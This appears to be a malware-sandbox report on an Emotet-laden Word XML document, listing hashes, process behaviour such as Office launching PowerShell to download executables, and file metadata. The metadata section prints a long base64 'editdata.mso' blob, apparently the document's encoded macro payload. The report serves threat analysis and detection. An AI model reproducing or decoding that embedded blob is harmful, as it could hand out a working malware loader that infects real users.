analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

2019-01

Full analysis: https://app.any.run/tasks/66dc8cca-d638-4056-8b19-eb7c65063288
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 12:45:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

C68900DE3BFA05A67E89375288401241

SHA1:

8AE0D511CF3CC7CE45D9400E6B4D7188A658EB3C

SHA256:

F81B5788D88B31A4689A13A770EDC2D389DB26CA0D0BB3FF528517152000FAA8

SSDEEP:

3072:YNGqNPxmmjL/xSu90OoiLuDKZXfwKeljR1z:YNCMxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2672)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2672)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2656)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2868)
    • Application was dropped or rewritten from another process

      • 422.exe (PID: 2396)
      • 422.exe (PID: 3068)
      • wabmetagen.exe (PID: 2572)
      • wabmetagen.exe (PID: 3072)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3236)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3236)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2980)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4044)
      • cmd.exe (PID: 2656)
    • Creates files in the user directory

      • powershell.exe (PID: 3236)
    • Application launched itself

      • cmd.exe (PID: 2656)
      • 422.exe (PID: 2396)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3236)
      • 422.exe (PID: 3068)
    • Starts itself from another location

      • 422.exe (PID: 3068)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2672)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2672)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3236)
      • 422.exe (PID: 3068)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 12:21:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 12:21:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: QWN0aXZlTWltZQAAAfAEAAAA/////wAAB/BNQQAABAAAAAQAAAAAAAAAAAAAAACSAAB4nOx7DXhU 1bnu2nt2ksnPhEkMSYj87IS/EUjY/z8M2vlJQsAA4UeINsJMkgmTkJ9JMiGRKt0EiohAU/Uqx9o2 oMfHtmqjtT602t5AraVeS9F6W9qrbcBeD+2xNvZ4+nh7b+WutfbasxdqT9VzntvnPM8dWDNr773e b3/ft77vXd/eC879pGjq+BMVF8D7PtcBD3jvci7Ips4xpOGPHwCWHL93+fJl5/Tl///5T/X5C2w5 ZA45+JsFG5rzJbAJsOXClgdbPmwFsPlgK4Rthh0CoAi2Ytiugq0EtpmwlcJWBls5bLNgq4Dtathm wzYHtrmwzYONh60StirY5sO2ALaFsC2CbTFsAdiuIbothb/LYKuGrQa25bCJsNXCVgebDJsCmwqb BpsOmwGbCdsK2IKwrYTtWhzbAHwKthBsYdgisEXJferh7yrSf+/vOjP/bz4bQR/8k4ZzUQd64e8A uOX9VPBvfkphxDiy8v/GWGFlhXftk68wHuT7Wfa5LdD74Y91xys/XsAwzv2z/sZ9nV/6WjvohDb/ e+7PMrQ/PypO89i/O2G0ajBypU94/wJ4f8TDKHc/6v1RDq/n7D5yBsJ7iAwn/xEneMEH8x/lxH9E /iM5PPho+Y+46MPyXwA2ByBZ/xH573CJwwENsK2GbQ25RyP5XYf8B1sTOd4IXL64gfS3wt9m2G6E 7SZyrgX+3gzbNti2wxaDLQ5bK2xt4O/DOYz0TYvBM88AYQnLjuWCVEl2gweMsqD9NxwHA2E2aBro 60q0pbM2oCkJsSXZbMm1j7F5OWw3U+LNLs5li63P/WDhtiJQwK4pXsnmlQJmYDDd7u/rTlzHzhqE tALzrA90g0QTDL4kWLgNeJaAllWfEQRBEiYUWagGXo6LgjwPW8gUC4Ki3TYfSDXCfGF+dAVo2drZ 2943PAhaBm8ZTCd6ZE5q8SSkmnR3K5i/vrGODw+lrb6eeLqzrxfEPIDdV7eub6An3p0FO1Z0APSA +AarvhDwVlGuxSxZ1hL1FOdlW1aPF4T3Va7v6Ohs279jfS3osCAbtI3u+HKWNe+e0cpVn5Fq64FR KyjRajUC6sPVoiBGqscitXWqtSMcthIVipUlHdxhfWfHQBz08PWd3YnBllC0r6enr5fLXgs62wb6 Bvs6IL1uSsYHEu0tYH19/eponaiBlrWb1tfUNjZmz7/dv28tL2o1gpdf37r3db6xs3ViID5wi7XQ AqWjI961m+onw4PXgcKwxa0Fm0D9/sjgAiCHYNqy7bUKUKW6OrG6Tqg16hkhXG0ArhoIkiYYUaW2 SYhEFK8w7GuvP79WEhoXR+bwk6kXF11aDjOiSpwEtaPsrTmjewqY6Kgg3DZfmBMZnT9ZYIEvqwL4 R5+Ve/skCJershYJyeGwXg3To5pToiBpKKpQHYroar0emdRkrjZ8ULthMDEAJylcu3b1utV7gNgS TqVq42kQb2nsa4t3t4DNiZ5Uy5ZI3fehk/WaxEi7t/2/rPSEqixwoabO9/kpUOH/XA0bO7y2JP+p 8KUZkdc94KrK08zPo7PA3os7tZCmSKsgG/l2ckALYdKsmHl7tnQ4ezbiqIasCCOO/tOjkMrm3lnF 7GWXnchf8EpVFZe99ASY79utiKKRBX9DuSKkDeMrC3wRz3zfKs9y34bly33eP09XLvfpsiF+a6FP D603Yr62it1hz30LfXVwyPFUxdP3tVXkBS75/K3UCsKUMpAv4YlSeNvfwBO/g/1a2N8I28Mel2R/ Hl3wCqLoB+HBQXj8NOwzWJBD25cvrwSo92Cyfir7taXXH/3DzLkNRfyqHuMG6fa2VesOZb067xev jX2gVEdCBiaaeq9jl6796v/e8U712wERUTO6eRah8ky6M15yNAJ/ve+Hvf/WtmJr6xwBtpr2t638 rzPHf+8PWi1YsKkK9ZFTNvkzPXIOrgyk52jPQEITwTrITZgkIEPVgM2QoDrBIFwN+iArD8HzCVwZ 5RIrGWYc3cmymdoPyJ2ZDz4DoT5a7xZSk8zus3FeeCZGjf4grgDjRscDLDqHUGPYQrv/18aj49gV oXGlTu+/1791PgnsNdT5hAApGnJAzofPgRetInCAvRowC+DS3QI2gg7yZwm8uAIu0QmYuSp0rgrF q+DXTEZD5f2x/TE/773AAGeW6EAnkfCVCRBOpwc6W4fSIMFviWxfF4ezy1/LV+3UNF6Rqnx5eVOR ODvIpkS8goDums3JzsHavlDbUE+iN+3bsorv7muNdzMPbEpx8Tamuz7ePZhgCk5EBxLxdLyV7Z45 rwkSfaJtQXccZK9uB/dtHmCHfJG6kVQfHFgyG3FgdzwdStQmBjp3zVwQtYYG0309nbv3R5l94se2 GPEPmEaTA9MdEgxoZG1zV8HjL17BP0/fhwMfXME/uyGNYjr8hB4v+AT1L5qZ+6J2fzes1GR4949v uXt/ZKVDch8Fg54995JQ3g7/bIIh2gR/hU9wf/8nsB/V+ouzP3j/T+IDdH8kymGnj4K5HrZe0s/E TwmJn4OMLehqeHz9cjIIoPj58zS6QkLqQ9evj6rAh5nxUdYr9m+J+c+0XtFaOdrjY3gmv7iGDX3A tVeuMM5vAbl6J75yGHspv3iLx/qY+FuvwNdykx8T33IF/o/clXb+dbzzsRNyP8Zz4IOB9GE+nPwr 59/v5/fr8FEQv/4rMfaRPmgh2sFE9nrdF6iwj0z0kj56iPaTPhrD2/1cdD1AzqMHb4H0UeyH7L4H YRsobDOFjVHYJIUdobAWhR2jsMco3cYp7ATpI9knKfnljCsnwLhyBMYdYzCunAa770HnmyhsjMIm GVeHFIW1SP9lYHOUIz/GunJSrCtnhHXHWKwrZ4x1dThGYR+hsBOsq8NJCnuG9O+CP+eoMUmPK2fE 48qxPK4OBz2unGMeV4dxCjtBYU96XPmTFPacx53H8xT2EoWdpu77LoX1cnb/Afjj59wxE5wrZ5Jz 5ZzhXB3Oca6cKc7V4RKFfZfCYionWG+Wiy3Pcm3ns1yskOVijSxXtxCFbSJ9FKfNlPxpSg7+InK8 2e4Yf7Yrh8929Q9ku1iDwoYobAOFbaawMQqborAjFNaisGOkvwXFADVmmpKDlz9H/xzXD/4cSv8c 14eBHEp/ChvKofSnsM05lP4UNkVhRyisRWHHSB/xyjFKN0xqRI7f68op97pyeK8rR/C6+hsUtoHC NlHYZgqb9Lr6pyisRWEPel3dxijsOOkjvnyEko+rJ0f/XEr/XEr/XEr/XFcHg8I2UNimXFeHZgqb pLApCmtR2IMUdozCjpP+LqQ/6aPCnYcDOWd+8xxh9jLnrEGxPHs8StFknis/lUfpkEfpQI0Zy6N0 yHP1f4TCnqSwk3mu385Q2POkfz/8maLGWPmunLF8V86xfHfMeL4rZyLf1eEkhT1DYc/lu/qfp7CX 8t3Ym6aw+O22k3cFLtZf4GJ50h+DP4ECV7eTBZQOlJxz1JjzlJxLBZQOFBa/mXd08LlYv4/Swedi Az4Xa1DYkM/Vv4HCNpO+heKBkj9FyZmm5LxLjcFfRI6/0PV/eaGLDRS6WKHQxRoUtoHCNlHYGIVN UtgUhbVI/x4Un9QYfoYrR5jhyjFmuGNCM1w5TTNcHZopbJLCpijsCIU9SPqIw8eoMZcoOe9ScnCR 56yDfldOud+dR95P6e+n9Pe78xiisE2k/zDSn5KPd2McHity5ZQXuXL4IleOUOT6waCwDRS2icI2 U9gkhU1RWIvCHqSwYxR2nPRRHfVIETVHxa6cpmJXTnOxOyZW7MpJFbs+HKGwBynsGIU9RmEfIf17 4c8ENabhKldO81WunNhV7pjkVa6ckatcP1gUdozCHrvK9cM4hZ0gfbQBeZL0EZ8LJS6fJ9Gu2ofw eaoEZPh8pMSVb5VQOpRQOpS4+o+XUDqUuPqfpLBnKOw5Cnuewl4qcf0/TWHxLqDDYzNd3fwzXSw/ 043hwExX/rmZrpwpSs4lasw0JQfvNhIdvKUutrzUxfKlLjZQ6mINChuisE0UtpnCxihsivTRi5SR UtfGS5Scdyk5eEfU4YEyV055masDX+ZihTIXa5S58kMUtqnMnbtmCpuksCkKO0JhD5J+DMUJpds0 JQfv4DrzWO6O8ZdT81ju6hAod7EGhQ1R2AYK20z66Nk0Vu7qeZ6Sc4mSM02NeZeS453l6uCf5WL5 WS42MMvFCrNcbIj0R5Fus6g4pORMUXIuUXKmKTl4l9uJwwoqDiuoOKyg4rCCikMKG6KwTRS2ucK9 b4zCpkgfbZKPkD7aQH+kwuWQc+g8xSF0v4rc6zzBos35qfeNd+SgXXx0zDB+2LsXhzUAP4IUlELW AYVdACSWAYuBwCbgscb+Dp5/FK6V14PN8HgFOwteM9g4ZLwozJzLl3H1CkIQdx3GrWS74XGE4HwE V882+xeDWihzC96MsV/R8KAR4tZgXAOUyYN1BHeJ4DbD6xvx9SbWxqG3Jk/DUq9tRcuQKQtmS0rS nob30Vp2qYahtNTUwL8gH47xAnQw3Nnbjo4KQd/woLP9LLW0oXMzQE97TWIkwS9v4xc2DfTtgLjF YAvLg5vYCthrJq8redBC9Cphbb1ibPOyxWAbuY70msDj2vH51gyug+DOMjauK+OnJGvjRrA9+WAg 3lMbT8dX7BGW4WNxIdYInQa2rviquUxayC/fsmL9OnyWBcuj+VB+FVgAeqFc2+7BRJqPbtjSY9t9 bZts9LdIezZo3aFVu9G5XNB8Q2/Tpl3hdSZA6KUUmgWr6/Oxh1fcFhxc/Jm+9NZ4RxSd8YHA5lZl Z881yxO1deoQ0WpErxbW71jWyK/t6rxl+EbswW7WfgjmwQDbXLsYpNgjN9v+SBN//NJj+2OELYfj d8HxzYML8pA/0NsjHtzKNvOLwW62qbgKxjEP9hDcWyQu9kM/jmI/WiywEA69sUL6JK9dUDMQERem 2hct6ugbwNbCyeU7e/mATvwjB2UxqMlB205dCopaUFSCuoDP5AFVD0pwjBaUbA+qQS2oGEFVC+pi UM/H8yMFNTOIoHoQ2N5RdHQgYqyK/XAA6n8r1v8w1PcQ1vcgi+w7Suz5IYmLu9hm72Iwxn4jp/nN b+T0kq1FHtyL/XdPxn/HCG4T8cMDrD1zi8H9MO96yVYmD07A8+P4/JdZdP+HCO5hcr9HcD4+zHbi t0sIh944YSuCkoD+imZQNbGlQWiYhFygSmTOg4rgOAO6QXXOwgPZQKNVE3oU2N51oEExqNp+coAm /GNj84ER1PQgvK9IzuQBEY+C06QhT36NXQG15sHjbPPsxeBR1gTVQIDHE8Suh0g8PZXhkydZDdtV 7kH+OJnx09NsFTz+DsH9C/HjJLz+PXz9WZj9CDeF5+k5HJ+n4bkWgHDPE9w9hAdeYJtLFoMz0I9t hNfQW0jsDQk6QQ1KyFfQKficgE5KOrJVhueJpSi0JGyq4x+IU1QUoMTjuQAFrGwGNRtTCNB1IShL QRViBRuHzsEzmhGU5SCJdHTKhJGMfPgitOJlaOc5bOdZVoT6v0Ls+Wdizy/h9fP4+s9YHdtzHufj rzK4V9ll8HiK4DqI/36TwV0k/hvHuEuZ82/gGfwdwT1J5msaXn8LX3+T7QBO/iPNYXBoIjQJWyti y4jnbK8pQTWoyuivHUHQzZqG/Ks5EYQg8K+ORiwGf2RR/Pwpo887+Phdoo9F8uL/YN75M9uE5xvb j/MJeNA8v8faUcAD1mPjThBctsdZNzmPaNuPcXkeh6e8HgkeFxDcDOI3v8fxa6HH9lsS2PbDtFEU +NeefWgtdIHi5BSyTEEBoolORqqIj0QJR4lIZh+GiALjRrE9hCJDQIGkSJidiuEdSz2Id0o89rYJ D8qJflNkfmZ7nLypgGOQfmdykF28B9UBczO4KoIrILgAxC3yINwCghvDuGUeZ/1b4kG4GoIbIPEn edC6KxC5CIfedtpZgryBqAVFhI57KHGgiQaxFlIv5GzN4Q8RRgSKG5IxdigQtyL7FWi/kdFTw/qs IPqcIvpc53F4dKVjfzayI5KZ7xDG1RLcZ8m8NniaCxaDesqOMYxr9Dg8swbj1hHcjwluI46zJtr+ bLvegcuTgiYPcoiB7YGHdsIjKiBRgOJCRIEAp1oVyLoU1CQUGNBsSK+EqzUYPdCFAiJsSEkkXkS8 gNn5shnrh2qhbjYfanYAf38Nf7+Iv/+Iv4s96FvB35s9CFkD2RDGfxaqL0OZ+nIsC9l/E/ZLcyZu Woj9e0ncxDxovdtG249x7Rl/t2K9OgjuHTJPXR6HR5JkntDOBLLUiQIy/9gjTm4hTylkBYKnsPMg 1ThVgoSWLcXJMNHAOWdijhWdTLR9jb5FwjqSgWYEIm2cYqLbwjFoMTCCdn2UsT+V0bsX2zVA7LqL 8Mouj8NXaWJXA4f8sdvjrHMjGHcrwbUSP1oexGN7KD/6MW6/B9Wno5n7HyC4IIm/Q/j6QQp33qkL RGKoYuLVzIsYWESVk+0/GYeXrEJrM1WChCLMmQCKu5w8JLykYCqD/lXJGAlBUXArNtt7gUQ8iLx3 GObtWCYvj2L77yJ2XCD23+tx6q17iN/8uA64H8fXsYz9DxDc14m/xzN8/GWCO4/rgIewP09kcA8T XCW539c8qJ56hPLbOGvzlonMgzmlKzgXYWkJlyzoTD2oZ9Z2HFaiAByezsQr8WSGtmzOJ+NkfGCQ qEL3wpGJAw356VHop4lM/DyO/fQk0ftOkjdPZ+x9ith7Ca/b38nw/kmMe5bg5hE/TWbWte8R3ATG PZe532mM20/W1zJyvzOZ+z1PcCN4vc+FFaCdfBqpB2EXu86pLu3wgvWhTVuE22R0VtHQ6igFnejB KQmZTLdrAy/ApYQsOZGq49oMFWOZakomxQX0KPbdCx57ns9m1qsXsT3niB++RfLllYyfXib2PILX /fMZ3M8w7pcEt4XEy68yuFcJLkXWfRFbZATtvl3SkFpOQiWPSHgF5R5VTjpcbxfNIi6NMNdM4fv/ JsOfF/HxG0Sfe8l8/i7DJ5dIHTI1A9nxFq4P3vRUARkoqF4juOPEjnfw9T9CDKrusP0zbN41kO6o OjXx04Id6SrRmEQ+UlzMrEoFyPYgbXMuwBU0JIYMp1A2m5lnBeQVaLXiPL9BCfA6JBDC3SoiF8lZ LBXslz950HuKP2fW43c9Laj+I/bdRuwDHKpz3vMg6wRs35lC5BeOc/zJcqgizOZs3DMEl8chnvFy K4AE7HpwDOMKOSdvCribUP1HcLVkHko4tP4Xc7a/8fpXCHCM2qwpYX8GJRTHJjrEjxI6iWN37tHA fMI/mr0gCQ7bOpMgZ1Y+u2ZQ1AyPKEGbtHWHkXRcjBskpkq5BAiDdqhvBeesX+Ucei6YTezZTfKd z/hpLteC7TnoQ35YwKE6oApjkN8XEdxJ4oclnMMjAc6OqyYfIDEC1RBRZGmiXfWp+MDWVMelshP9 NkvCsID5LQs0S5qoKJLtnBGc5zEkmcSZ/TxmIGpBzsnwMGYl9CyGyjHsi2VcJ4oNzsmfGg69N5OI PWtIPGicw3sK14vtsQqQH1ZwTv1pcMPweCXB/QPxX4hD6851HPL2Lvv9V4EdD0FJQXOCp03WcW64 s4S+ndwQ0aO646E8gPMGJ4xTJ9v+kXSSYRomTgnnpWrXKxHOzm9YC8JMP4xrvUfx9wv4ewp//wl/ l3Loexn+jnD4fZoH1YNoV/her5WpB9GOMayTcZ7UcwJ5vl7DXVnXrcv4p5Gzn8caMG4j56z/TVwH qjwJbgfBNXMOv27hejDOj3EtHFqnb4JzsAPUwONtBPctMk+tHHr+iHHd8Gl+q/38l2e/n9MdYhIN OydEEjFkFUFP/PZrIxyPsvOuCfaCohhUbD7DHARrQ6cakh1Okpy3IwahNjxFhCedOXLi0LCnHUU+ qawWg3YO5VEy45cOzEtdxD6W+KU345duko/v5uL3dByq+1LcWvTfZ+BxmuDaST6OZOJ7F5fEuEmM uxX7azeH/un9ADzeQ3C55H6jGX0sgkP/MgL7RcN+Uu1sU/EbD3iM1wrbapk836sZX0EXINcKNrfl 2/ko4sqBMKAikuIbTQReyfdjPxzEeXSAkyCLo/ceh4ie3yXzfjTDY4c5+73HlBfZdxeH3jeNcSg6 EVfdQ3DFxL5jmK/v5ezoxesfxj3AOe+t7+dQ5nyZ4B4jdcMJHPfj3Hr8r+rx+u+16yAnGgzyfHFl vs6wY4Es+tB4p6pGfkJfml2P+1AVZKcxjFARR8hDMIsfyfDqw5invkb06iJ+eDxz/VGSb+fxc/uT mfMTHOKBpwhuNsGdzFx/muDGc0BGM7LemPa825SVT55q4YyhvCHvWmFNgN5RKNTzgr0SCWgIqe80 UqnB5LMxOl7zdNFmq+9ADb+H5+VZqMs6vL5MOvqSeXsOx8NpyB1pyAP4/Sd+Pj/DOc8Nz2P/vMBd +d70LM6TF7mdME9sHj+ZbT8f2eQg4AAOOoyhk3LF4QJdvaa9jx+0ZzKR5of7r60c7q+sRC/ryZgV exY2LRMrF9m2LursQC+vE/1DPJl/lU+0Jft4CFuxp1rVsMXncIyjOHslk98vYz74GdH/t877Pcx/ 57lqWJdIdv7j5+tfceg956tcDTCAhhidu7Le/02mbrlI1uNJjLuE66M3uNtwdsA6kuDiBPcW5oc3 OcQqA3b+Z9n5r1Te2oZ2X9COw0ji/XsYANs1zdn7TPD5H951P15THsLf38Hf5/D3NF5laiGno3Um gN474H/6jPSrYXm4/qBRtXjsu9COP3Esev/HtYE+ZD9n74hNc5n/ZHLx5F/7Tya7FRGIRpUvr36o F7Sh/63Ix2GBpyuBa3x560EvXzcw0DfA+zcmBofAxLrECEj78lK6LKkMSG3sbQ+0SgZnamDjpkR3 og2k+Wh8MMF3TpqG5MvjswC7CBiaL29IlhVWA/rq3nRgUPfqugr0ut52fp8nyIqDoixK0FmNfTsC O2XBGDUKburVNUnxfRqIsi9vWBQUhjGim3p3BNKaV1GVGS07DU2vUkDNxr4hq6VdLjAEpviOln5N EnILl0uy1bHbVEUGzNkc7w0Mq+qocaRmWFcMw5oBqshGG8A7bVX8UsBX2XttKbTZBphRL5M17O3s bWez0Q4bcLbYuJY2NhfvrwFng622bwd4Makro9dtAjt6A+2qqUrHDx8aNgzp6EmV+TTfr8uKbF0f jYC+vu5AnyloVzM7fTfrISU7t0PX2yWzoHyXDsCRm5XT2uTsTkPWT6WZ7oOtkni2TlbUU/NAFdlI G0M7aawpLmT1nL1Zpz2ns/HWmb13dppbHmX2MtHkQEBWrrnj1MbBROgYzMFITma3LGRvl41yzcDZ K7s77DnlU+TTvtX1ozmZ7THv1nhHpLQqsLkVOJtjnDo06sUbY8DZGeOGb5zc1mNohsmwq25JJwJp 3eRUvWDVkCiIZp1vlck822bIzJF6q3Mk0KkoQviGWYe3xaXJQ+GyTemBImuXYQoFZW2qwYo/LpVk w5fXWS6aQvgBy4wEUuWqrOxduLpslyqwcvi3VXgbDDj7YAV9Axdnh65Hm2BcQD/B4A0wL6TQUQZt YVlk+8vD+tHWF89BLmMuesi2V8je6nk9R2pC5H0hW5+frTTDqiYCprLVWKDDE9uytzac7g10Gftl uXv2gKnLhQGgqKovr0/V3pJGZ4cPgArl1PzGwPi6/ZqerbTKgvrY1qZhSRWPBgzrQKrckIQLxeG6 QUmp7G8b0mTzwqFN/ccGAh0h4/dy0hj7VKtyvD+uG5F/qLprmDPEx/PjigLNB2VVaMsqDMQGuFBG tlYF+YD0A6ZabauBXJxVE6tepF4UmBrZqMxSzR/yWhu7PxsWb/u4fUq5FDR5MJ+FNddKPTjpW8jF jAhk8uNATaqCEK+PxoaKE+BLhtSjdhpmgakfvTl8JK6Zxvx4zoNfTyrihom4fEB6sNPa3a5rwo+v WdYhx9i3blZialrndKPyjvVt6UDXJU3Qxn64O5aIqxd6Coa01//bV5/pEjWxWDiSr2khtlXURs3K oWhta3cglHPAvHD2t40dsqy3qs8FJasaPrBVStby6Ima8WvQasIslfUpdr4Yapcq2x+aDIpnYMnA r5CDdStCveN4m+i5LNWSpvD+EB+uZwGbQttCCwancvhsOcyoXYaqmXu39YUGA12Kop1V1AW6vG6O rvB6j8KJWri4ITESGOJk6bMlPN8uCYeMSjY6mTUkm39Zt6BTPauIwngsKR/WtJeUL2S1i+KJ+Ree XZE0RTk8u5L1f2btW7d1pRp7801lYl8yW5k2wYxNnb2B9I63c4XaH2UNGxMF00zV/7JqNHG8VC5p KhNKnpp1qorBT29N5erMk3DdH1trlb8uBqfYLB7oU4wvr0sWOpTjdRfyutSJ3MPX9zcawtg1dx6V DbB/V4lo7D0Q3XBzytQOa+Krebwnreijg7+oWpzWi9hvL9kZGonNuOWZLEW0toduFXNP3bfzRU05 fV9L6U61Lf9EXOgTNf2lZS9kKUL+5A3PZIl+pl/RjO8/kbV3Xqeo6t8dbRLylH5fVawevYo7pERL ZWEmLE3+O3hDGgcvtWvi60x8eUi+PcY0lSoM2nsp9fwjXyMUJRWJb9j50rIfWLOjlduThhHx/ih/ LK2p4q9aTRMEjrXJ6qaVp+pUeUZA4Pnd0uisJ7JapbuFLxbMGVI+n9QN/zX+YVMw7ypKDmwtD3Qa AMybM6jpB0Sm6fjYLkUTitZU35HfyWx8a5XUNHdILTDUl+re/lKHLklv33xPl6pV9abiG8qaWtXB XbpVZp4amW5TjPk/LbWGZS24aZUY3CNOVY/P2ty+r/q5q58olQ+bQuv6Db5uQ5X2v3RNfp9qzijS T80X/PWSGOnvb1cVcL9vIK87MGTGfGOzv7CkzyuJws2BAdmUO88+LUrCmt6U+nJpowWXoSFdkL9y d4zvURTxicDbsdao/9hrpcOKIPVWSebx/B5j2ipadGpbl/Z9/7FnZ/eYirzhduuWy/7S1E1g2ysz p8GG5qnt0zdt95SFZvIsGIstU19p0cqEewTWuk28u0JTgv/KAzVWY4A1r5efmxW6q2y0nv05nzvc +txSfnh16zeX8vIDS/kHR5dex7clp5mX1/0RAHMpb3qqlvJ35e8r/8GrvrzKO15TFUP8/GsJvnrf a/HJVFFLtL+sC5LV0ec7NeXtWV+MGjcye3drfik8MxJ/svMN2f8/50ltJr8oxBZVNnTqyp77Rekn j+uSCqTd0uvDL22P69F9zb9YlNIEeW9+1eV/rYm3iC0bvv+DNeGvyWvGR/7HuYbpMvWns/jZ6lTF U6v/JPqHpypMkVMbX5+zATxWy0qTn7XaJQ+nTH1jpRwE/HTHGDOups3bJ54dLyzK79FNadJ/2x3q rqnHrJo7S/xLhR3ic4qwcCBtatc1857CgSnx1GfvvrdLEeXcnnv6la+U8IamAd8XToK8lGSKCn8t 4KNwhQn0iUCRZVjI1PWCdh5XKGkAyxKe71RMTpCYwxG0Ksd2yyIsB8Y8Fg9w+bJTF1ZKArsFFtoc G1BNC9Ygkqpq2Wm+VVU0s+B7g6ZXkgRQWQWLfYvsIsCyDxYTPCRvlcfbCGyBrABnD4GV2Rn2/gFw NhCKJc9V8KlgblBSvUFF4Ragl+HjeNuAnSEx6kYFLFeCnjpprylaahAWaSnFuuE4qN3UPxCwdihH +/2aKqtH+k1ThirGVVnQrdkArVspQ1eyxYJ+cBCuyobBgKJoBK3RA+W6oltFd4z3ipAUpSM1iqT7 8ry7RMNzvG8wMFygy8zswz/pNlU5W2Zq9l7olSVNCRfU9Ou6YPhgNAqiL68fJgMT3o4Lsi71hHak plUUT1dXTbaH7J0BbovK422ByW49eFbfdxNIgj5RiHrYxDOTidoc2ZOYTJxq0057T8ujLHrhXzsC 2oomPwMXhlBbjySyOrMI8XVSPqPL6mElbU7edUSp1VRLGRal569vLRc1IVxY0LhTlk5L7Hdh2dMF bnyxdHpYhvRTbPXsA5Fv7peMydadoqCN9hvJgUiocF9hQVnSbDT18L5wTZ+6vix1EhYZVvH1ZaP3 doLxttP9od27DCnyi9yyfr8oK+bkLVVG8A2ZXfP9DUYQTJze4fn2S54X4LPZ5E+E5749uX3SflUf 2hr99JuSOfq9SV32sFPM1M5WaR8j60HAWTulQ+brpsJ74QNeCFb+zJTcJSl6ZWWjBcvdpGYIjyV4 SEay8ntZNI5PLtktweW6PGotrxiY2iGNL28M7JL0w5oK5ozmwxrj9zcuioNtZ48Y6pSvXy4Qpb3L 